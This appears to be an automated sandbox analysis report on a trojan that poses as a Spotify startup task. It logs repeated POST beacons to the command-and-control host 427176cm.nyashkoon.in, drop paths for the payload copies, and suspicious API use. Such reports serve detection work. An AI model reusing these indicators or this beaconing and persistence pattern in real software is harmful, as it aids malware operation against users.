                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global trafficDNS traffic detected: DNS query: 427176cm.nyashkoon.in
                                    Source: unknownHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 336Expect: 100-continueConnection: Keep-Alive
                                    Source: fontReviewsavesinto.exe, 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://427176cm.nyashkX
                                    Source: fontReviewsavesinto.exe, 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://427176cm.nyashkoon.in
                                    Source: fontReviewsavesinto.exe, 00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://427176cm.nyashkoon.in/
                                    Source: fontReviewsavesinto.exe, 00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmp, fontReviewsavesinto.exe, 00000011.00000002.3686700129.0000000003573000.00000004.00000800.00020000.00000000.sdmp, fontReviewsavesinto.exe, 00000011.00000002.3686700129.00000000036A5000.00000004.00000800.00020000.00000000.sdmp, fontReviewsavesinto.exe, 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://427176cm.nyashkoon.in/providerlinerequestpollSecureHttppublictempcentral.php
                                    Source: fontReviewsavesinto.exe, 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://427176cm.nyashkoon.in_h
                                    Source: fontReviewsavesinto.exe, 0000000B.00000002.1337505438.000000000330C000.00000004.00000800.00020000.00000000.sdmp, fontReviewsavesinto.exe, 00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                                    System Summary

                                    barindex
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F86FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00F86FAA
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeFile created: C:\Windows\Vss\Writers\Application\kRoaRVhtzmWNJQRz.exeJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeFile created: C:\Windows\Vss\Writers\Application\8e184785bc19a8Jump to behavior
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F8848E0_2_00F8848E
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F840FE0_2_00F840FE
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F900B70_2_00F900B7
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F940880_2_00F94088
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00FA51C90_2_00FA51C9
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F971530_2_00F97153
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F832F70_2_00F832F7
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F962CA0_2_00F962CA
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F943BF0_2_00F943BF
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F8F4610_2_00F8F461
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00FAD4400_2_00FAD440
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F8C4260_2_00F8C426
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F977EF0_2_00F977EF
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00FAD8EE0_2_00FAD8EE
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F8286B0_2_00F8286B
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00FB19F40_2_00FB19F4
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F8E9B70_2_00F8E9B7
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F96CDC0_2_00F96CDC
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F93E0B0_2_00F93E0B
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F8EFE20_2_00F8EFE2
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00FA4F9A0_2_00FA4F9A
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeCode function: 11_2_00007FFAAC3D0D4811_2_00007FFAAC3D0D48
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeCode function: 11_2_00007FFAAC3D0E4311_2_00007FFAAC3D0E43
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeCode function: 17_2_00007FFAAC4F0D4817_2_00007FFAAC4F0D48
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeCode function: 17_2_00007FFAAC4F0E4317_2_00007FFAAC4F0E43
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeCode function: 17_2_00007FFAAC5B300F17_2_00007FFAAC5B300F
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: String function: 00F9EB78 appears 39 times
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: String function: 00F9F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: String function: 00F9EC50 appears 56 times
                                    Source: HcEvQKWAu2.exe, 00000000.00000003.1221219115.0000000006F81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs HcEvQKWAu2.exe
                                    Source: HcEvQKWAu2.exe, 00000000.00000003.1220726109.0000000006680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs HcEvQKWAu2.exe
                                    Source: HcEvQKWAu2.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs HcEvQKWAu2.exe
                                    Source: HcEvQKWAu2.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: fontReviewsavesinto.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: kRoaRVhtzmWNJQRz.exe.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: kRoaRVhtzmWNJQRz.exe0.11.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, W9tBG94LH5Z9xqvOxZb.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, W9tBG94LH5Z9xqvOxZb.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, W9tBG94LH5Z9xqvOxZb.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.HcEvQKWAu2.exe.66ce702.0.raw.unpack, W9tBG94LH5Z9xqvOxZb.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, W9tBG94LH5Z9xqvOxZb.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, W9tBG94LH5Z9xqvOxZb.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, W9tBG94LH5Z9xqvOxZb.csCryptographic APIs: 'CreateDecryptor'
                                    Source: 0.3.HcEvQKWAu2.exe.6fcf702.1.raw.unpack, W9tBG94LH5Z9xqvOxZb.csCryptographic APIs: 'CreateDecryptor'
                                    Source: classification engineClassification label: mal100.troj.evad.winEXE@18/18@1/1
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F86C74 GetLastError,FormatMessageW,0_2_00F86C74
                                    Source: C:\Users\user\Desktop\HcEvQKWAu2.exeCode function: 0_2_00F9A6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00F9A6C2
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeFile created: C:\Program Files (x86)\windowspowershell\Configuration\Schema\kRoaRVhtzmWNJQRz.exeJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\fontReviewsavesinto.exe.logJump to behavior
                                    Source: C:\ComponentSavesinto\fontReviewsavesinto.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2172:120:WilError_03
